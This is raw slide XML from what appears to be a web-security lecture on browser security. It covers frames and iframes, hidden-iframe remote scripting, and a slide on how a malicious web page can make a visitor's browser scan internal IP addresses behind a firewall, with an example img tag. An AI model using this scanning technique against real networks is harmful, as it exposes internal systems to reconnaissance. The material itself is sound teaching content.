            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>          alert("Total time: " + (end - start));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     test.src = "http://www.example.com/page.html";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/body&gt;&lt;/html&gt;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676400" y="152400"/>
            <a:ext cx="23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web functionality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8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Port scanning behind firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501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quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1264911"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>JavaScript can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Request images from internal IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Example:  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=“192.168.0.4:8080”/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Use timeout/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>onError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to determine success/failure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Fingerprint </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>webapps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> using known image names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50180" name="Picture 4" descr="DS15serverfron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1" y="3479475"/>
            <a:ext cx="2436813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5499100" y="3322311"/>
            <a:ext cx="46038" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="317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2336800" y="3138161"/>
            <a:ext cx="7856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</a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50183" name="Picture 8" descr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4364" y="3719186"/>
            <a:ext cx="1487487" cy="11382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5961" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6983414" y="3917625"/>
            <a:ext cx="1387475" cy="7969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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50185" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5735638" y="5916286"/>
            <a:ext cx="91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</a:rPr>
              <a:t>Firewall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4224339" y="3211187"/>
            <a:ext cx="3781425" cy="650875"/>
            <a:chOff x="1760" y="2186"/>
            <a:chExt cx="2382" cy="410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50206" name="Freeform 12"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1760" y="2364"/>
              <a:ext cx="1605" cy="232"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1197"/>
                <a:gd name="T1" fmla="*/ 1280 h 211"/>
                <a:gd name="T2" fmla="*/ 168353 w 1197"/>
                <a:gd name="T3" fmla="*/ 5 h 211"/>
                <a:gd name="T4" fmla="*/ 315092 w 1197"/>
                <a:gd name="T5" fmla="*/ 1098 h 211"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1197"/>
                <a:gd name="T10" fmla="*/ 0 h 211"/>
                <a:gd name="T11" fmla="*/ 1197 w 1197"/>
                <a:gd name="T12" fmla="*/ 211 h 21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97" h="211">
                  <a:moveTo>
                    <a:pt x="0" y="211"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="110"/>
                    <a:pt x="441" y="10"/>
                    <a:pt x="640" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="839" y="0"/>
                    <a:pt x="1018" y="90"/>
                    <a:pt x="1197" y="18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7" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2664" y="2186"/>
              <a:ext cx="147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>
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1) “show me dancing pigs!”</a:t>
              </a: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821113" y="3771574"/>
            <a:ext cx="2976562" cy="709612"/>
            <a:chOff x="1506" y="2539"/>
            <a:chExt cx="1875" cy="447"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50204" name="Freeform 14"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1858" y="2539"/>
              <a:ext cx="1523" cy="212"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1544"/>
                <a:gd name="T1" fmla="*/ 4836 h 176"/>
                <a:gd name="T2" fmla="*/ 585 w 1544"/>
                <a:gd name="T3" fmla="*/ 186 h 176"/>
                <a:gd name="T4" fmla="*/ 1190 w 1544"/>
                <a:gd name="T5" fmla="*/ 6030 h 176"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1544"/>
                <a:gd name="T10" fmla="*/ 0 h 176"/>
                <a:gd name="T11" fmla="*/ 1544 w 1544"/>
                <a:gd name="T12" fmla="*/ 176 h 1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44" h="176">
                  <a:moveTo>
                    <a:pt x="0" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="70"/>
                    <a:pt x="502" y="0"/>
                    <a:pt x="759" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1016" y="12"/>
                    <a:pt x="1280" y="94"/>
                    <a:pt x="1544" y="17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5" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1506" y="2813"/>
              <a:ext cx="101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>
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2) “check this out”</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50188" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7123113" y="4827261"/>
            <a:ext cx="9554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chemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50189" name="Picture 17" descr="cisco-520-22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94289" y="5246362"/>
            <a:ext cx="142557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8477250" y="2314249"/>
            <a:ext cx="1855788" cy="1420812"/>
            <a:chOff x="4439" y="1621"/>
            <a:chExt cx="1169" cy="895"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50201" name="Picture 11" descr="CompaqAlphaServerES4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880" y="1621"/>
              <a:ext cx="728" cy="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202" name="Line 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4439" y="2054"/>
              <a:ext cx="32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3" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4541" y="2204"/>
              <a:ext cx="263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00">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scan</a:t>
              </a:r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" name="Group 38"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8505826" y="4316086"/>
            <a:ext cx="1751013" cy="1436688"/>
            <a:chOff x="4457" y="2882"/>
            <a:chExt cx="1103" cy="905"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50198" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop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655" y="2882"/>
              <a:ext cx="905" cy="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199" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4504" y="3017"/>
              <a:ext cx="341" cy="2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0" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4457" y="3152"/>
              <a:ext cx="263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00">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scan</a:t>
              </a:r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6349997" y="4974900"/>
            <a:ext cx="642786" cy="384175"/>
            <a:chOff x="3048" y="3297"/>
            <a:chExt cx="456" cy="383"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50196" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3048" y="3297"/>
              <a:ext cx="361" cy="3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7" name="Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3208" y="3435"/>
              <a:ext cx="296" cy="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000">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scan</a:t>
              </a:r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670301" y="4654225"/>
            <a:ext cx="3173413" cy="593725"/>
            <a:chOff x="1411" y="3095"/>
            <a:chExt cx="1999" cy="374"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50194" name="Freeform 32"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1887" y="3095"/>
              <a:ext cx="1523" cy="212"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1544"/>
                <a:gd name="T1" fmla="*/ 4836 h 176"/>
                <a:gd name="T2" fmla="*/ 585 w 1544"/>
                <a:gd name="T3" fmla="*/ 186 h 176"/>
                <a:gd name="T4" fmla="*/ 1190 w 1544"/>
                <a:gd name="T5" fmla="*/ 6030 h 176"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1544"/>
                <a:gd name="T10" fmla="*/ 0 h 176"/>
                <a:gd name="T11" fmla="*/ 1544 w 1544"/>
                <a:gd name="T12" fmla="*/ 176 h 1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44" h="176">
                  <a:moveTo>
                    <a:pt x="0" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="70"/>
                    <a:pt x="502" y="0"/>
                    <a:pt x="759" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1016" y="12"/>
                    <a:pt x="1280" y="94"/>
                    <a:pt x="1544" y="17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5" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1411" y="3296"/>
              <a:ext cx="124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>
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>3) port scan results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676400" y="152400"/>
            <a:ext cx="223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consequence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33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34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32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973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6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838200" y="2815"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Remote scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1463315"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Exchange data between a client-side app running in a browser and server-side app,  without reloading page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Java Applet/ActiveX control/Flash </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Can make HTTP requests and interact with client-side JavaScript code,  but requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>LiveConnect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> (not available on all browsers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>XML-RPC </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>open, standards-based technology that requires XML-RPC libraries on server and in your client-side code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Simple HTTP via a hidden IFRAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>IFRAME with a script on your web server (or database of static HTML files) is by far the easiest of the three remote scripting options  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57348" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3039663" y="5684122"/>
            <a:ext cx="58146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See:  http://developer.apple.com/internet/webcontent/iframe.html</a:t>
            </a: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2667000" y="4879677"/>
            <a:ext cx="6324600" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Important Point: A page can maintain bi-directional communication with browser (until user closes/quits)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22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838200" y="2819"/>
            <a:ext cx="10515600" cy="682625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Simple remote scripting example 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14600" y="1025106"/>
            <a:ext cx="7715250" cy="2895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spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt; 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/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>handleResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() { 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/>
              <a:t>      alert('this function is called from server.html') } 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/>
              <a:t>&lt;/script&gt; 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/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RSIFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"     name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RSIFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" 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/>
              <a:t>      style="width:0px; height:0px; border: 0px" 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/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="blank.html"&gt;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/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; 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="server.html" target="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RSIFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt;make RPC call&lt;/a&gt;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14600" y="4377906"/>
            <a:ext cx="771525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spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt; 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/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>window.parent.handleResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() 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/>
              <a:t>&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29701" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2170114" y="5520906"/>
            <a:ext cx="8269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/>
              <a:t>RPC can be done silently in JavaScript, passing and receiving arguments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29702" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2247900" y="3977856"/>
            <a:ext cx="7734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/>
              <a:t>server.html: another page on same server, could be server.php, etc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29703" name="TextBox 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2200276" y="625056"/>
            <a:ext cx="81808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dirty="0"/>
              <a:t>client.html: “RPC” by passing arguments to server.html in query string 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60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9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Frame and iFrame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level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/>
              <a:t>Window may contain frames from different sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Frame: rigid division as part of frameset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>iFrame: floating inline frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>iFrame example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Why use frames?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Delegate screen area to content from another source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Browser provides isolation based on frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Parent may work even if frame is broken</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50180" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="3352800"/>
            <a:ext cx="6858000" cy="1066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spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframe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="hello.html" width=450 height=100&gt; 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/>
              <a:t>If you can see this, your browser doesn't understand IFRAME. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;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50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Windows Interact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29699" name="Content Placeholder 4" descr="gmail-cha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09800" y="1524000"/>
            <a:ext cx="8001000" cy="4833938"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2970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763000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F8A1FAB6-8AD0-4CCD-882B-A9FAE9926EE2}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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99795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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="457200"/>
            <a:ext cx="82296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Analogy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Text Placeholder 6" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="1371601"/>
            <a:ext cx="4040188" cy="639763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Operating system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47108" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
